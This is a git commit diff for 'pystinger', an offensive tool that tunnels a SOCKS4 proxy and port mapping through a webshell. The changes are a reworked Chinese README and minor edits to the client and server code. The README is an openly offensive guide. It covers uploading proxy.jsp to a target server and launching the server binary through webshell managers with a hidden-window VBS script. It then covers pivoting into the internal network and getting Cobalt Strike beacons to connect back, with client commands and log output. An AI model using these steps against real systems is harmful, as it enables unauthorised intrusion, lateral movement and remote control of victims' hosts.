更新readme

zhaochengyu · zhaochengyu · commit a77bc3bcd56e · 2020-06-05T11:15:38.000+08:00
diff --git a/readme.md b/readme.md
@@ -1,12 +1,20 @@
-# 毒刺(pystinger_for_darkshadow)
-毒刺(pystinger_for_darkshadow)是一个通过webshell实现**内网SOCK4代理**,**端口映射**.工具主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本.
+# 毒刺(pystinger)
+
+毒刺(pystinger)通过webshell实现**内网SOCK4代理**,**端口映射**.
+
+可直接用于metasploit-framework,viper,cobalt strike上线
+
+主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本.
+
 # 使用方法
 
 ## SOCK4代理
-* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp)可以访问,页面返回 stinger XXX!
+
+* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp) 可以访问,页面返回 stinger XXX!
 * 将stinger_server.exe和stinger_server.vbs上传到目标服务器,蚁剑/冰蝎执行```stinger_server.vbs```启动服务端
-(修改vbs中路径,不要直接运行exe文件,会导致tcp断连)
-* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```,生成如下输出表示成功
+> 修改vbs中exe路径,不要直接运行exe文件,会导致tcp断连
+* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```
+* 如下输出表示成功
 ```
 root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1 -p 60000
 2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
@@ -37,10 +45,12 @@ root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1
 * 此时已经在本地60000启动了一个192.168.3.11所在内网的socks4代理
 
 ## cobalt strike单主机上线
-* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp)可以访问,页面返回 stinger XXX!
+
+* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp) 可以访问,页面返回 stinger XXX!
 * 将stinger_server.exe和stinger_server.vbs上传到目标服务器,蚁剑/冰蝎执行```stinger_server.vbs```启动服务端
-(修改vbs中路径,不要直接运行exe文件,会导致tcp断连)
-* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```,生成如下输出表示成功
+> 修改vbs中路径,不要直接运行exe文件,会导致tcp断连
+* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```
+* 如下输出表示成功
 ```
 root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1 -p 60000
 2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
@@ -67,20 +77,23 @@ root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1
 2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
 2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
 ```
-* cobalt strike添加监听,端口选择RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1
+* cobalt strike添加监听,端口选择输出信息RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1
 * 生成payload,上传到主机运行后即可上线
 
 ## cobalt strike多主机上线
-* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp)可以访问,页面返回 stinger XXX!
+
+* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp) 可以访问,页面返回 stinger XXX!
 * 将stinger_server.exe上传到目标服务器
 * 修改stinger_server.vbs,示例如下:
 ```
 Set ws = CreateObject("Wscript.Shell")
 ws.run "cmd /c D:\XXXXX\stinger_server.exe 192.168.3.11",vbhide
 ```
-(192.168.3.11可以改成0.0.0.0)
-*蚁剑/冰蝎执行```stinger_server.vbs```启动服务端
-* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```,生成如下输出表示成功
+> 192.168.3.11可以改成0.0.0.0
+
+* 蚁剑/冰蝎执行```stinger_server.vbs```启动服务端
+* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```
+* 如下输出表示成功
 ```
 root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1 -p 60000
 2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
diff --git a/stinger_client.py b/stinger_client.py
@@ -55,7 +55,7 @@ def __init__(self):
         # }
         # socket参数
         self.LOCAL_ADDR = None
-        self.READ_BUFF_SIZE = 51200
+        self.READ_BUFF_SIZE = 11200
         # 日志参数
         self.LOG_LEVEL = "INFO"
         self.logger = get_logger(level=self.LOG_LEVEL, name="StreamLogger")
@@ -102,9 +102,8 @@ def _post_data(self, url, data={}):
             else:
                 return web_return_data
         except Exception as E:
-
             self.logger.warning("WEBSHELL return wrong data")
-            self.logger.warning(r.content)
+            self.logger.debug(r.content)
             return None
 
     def run(self):
diff --git a/stinger_server.pyw b/stinger_server.pyw
@@ -14,7 +14,7 @@ try:
 except Exception as E:
     from SocketServer import BaseRequestHandler
     from SocketServer import ThreadingTCPServer
-
+import os
 import threading
 import time
 from socket import AF_INET, SOCK_STREAM
@@ -308,7 +308,8 @@ class ControlCenter(threading.Thread):
             client_address_one_data = mirror_post_send_data.get(mirror_client_address)
 
             if serverGlobal.MIRROR_CHCHE_CONNS.get(mirror_client_address) is None:
-                serverGlobal.logger.warning("MIRROR_CLIENT_ADDRESS:{} not in MIRROR_CHCHE_CONNS".format(mirror_client_address))
+                serverGlobal.logger.warning(
+                    "MIRROR_CLIENT_ADDRESS:{} not in MIRROR_CHCHE_CONNS".format(mirror_client_address))
                 continue
             else:
                 server_socket_conn = serverGlobal.MIRROR_CHCHE_CONNS.get(mirror_client_address).get("conn")
@@ -332,12 +333,13 @@ class ControlCenter(threading.Thread):
                     if len(tcp_send_data) > 0:
                         serverGlobal.logger.info(
                             "MIRROR_CLIENT_ADDRESS:{} CLIENT_TCP_SEND_LEN:{}".format(mirror_client_address,
-                                                                              len(tcp_send_data)))
+                                                                                     len(tcp_send_data)))
 
                     send_flag = True
                     break
                 except Exception as E:  # socket 已失效
-                    serverGlobal.logger.warning("MIRROR_CLIENT_ADDRESS:{} Client send failed".format(mirror_client_address))
+                    serverGlobal.logger.warning(
+                        "MIRROR_CLIENT_ADDRESS:{} Client send failed".format(mirror_client_address))
                     serverGlobal.logger.exception(E)
 
             if send_flag is not True:
@@ -362,7 +364,7 @@ class ControlCenter(threading.Thread):
                     if len(tcp_recv_data) > 0:
                         serverGlobal.logger.info(
                             "MIRROR_CLIENT_ADDRESS:{} SERVER_TCP_RECV_LEN:{}".format(mirror_client_address,
-                                                                              len(tcp_recv_data)))
+                                                                                     len(tcp_recv_data)))
                     revc_flag = True
                     break
                 except Exception as err:
@@ -380,6 +382,9 @@ class ControlCenter(threading.Thread):
 if __name__ == '__main__':
 
     if len(sys.argv) > 1:
+        if sys.argv[1] == "check":
+            print(os.path.dirname(os.path.realpath(sys.argv[0])))
+            sys.exit(1)
         listenip = sys.argv[1]
     else:
         listenip = LOCALADDR
@@ -394,7 +399,7 @@ if __name__ == '__main__':
             break
     if SERVER_LISTEN is None:
         print("[x] There is no available control server port")
-        exit(1)
+        sys.exit(1)
 
     MIRROR_LISTEN = None
     for port in MIRROR_PORT:
@@ -405,7 +410,7 @@ if __name__ == '__main__':
             break
     if MIRROR_LISTEN is None:
         print("[x] There is no available mirror server port")
-        exit(1)
+        sys.exit(1)
 
     serverGlobal = ServerGlobal()
     serverGlobal.SERVER_LISTEN = SERVER_LISTEN
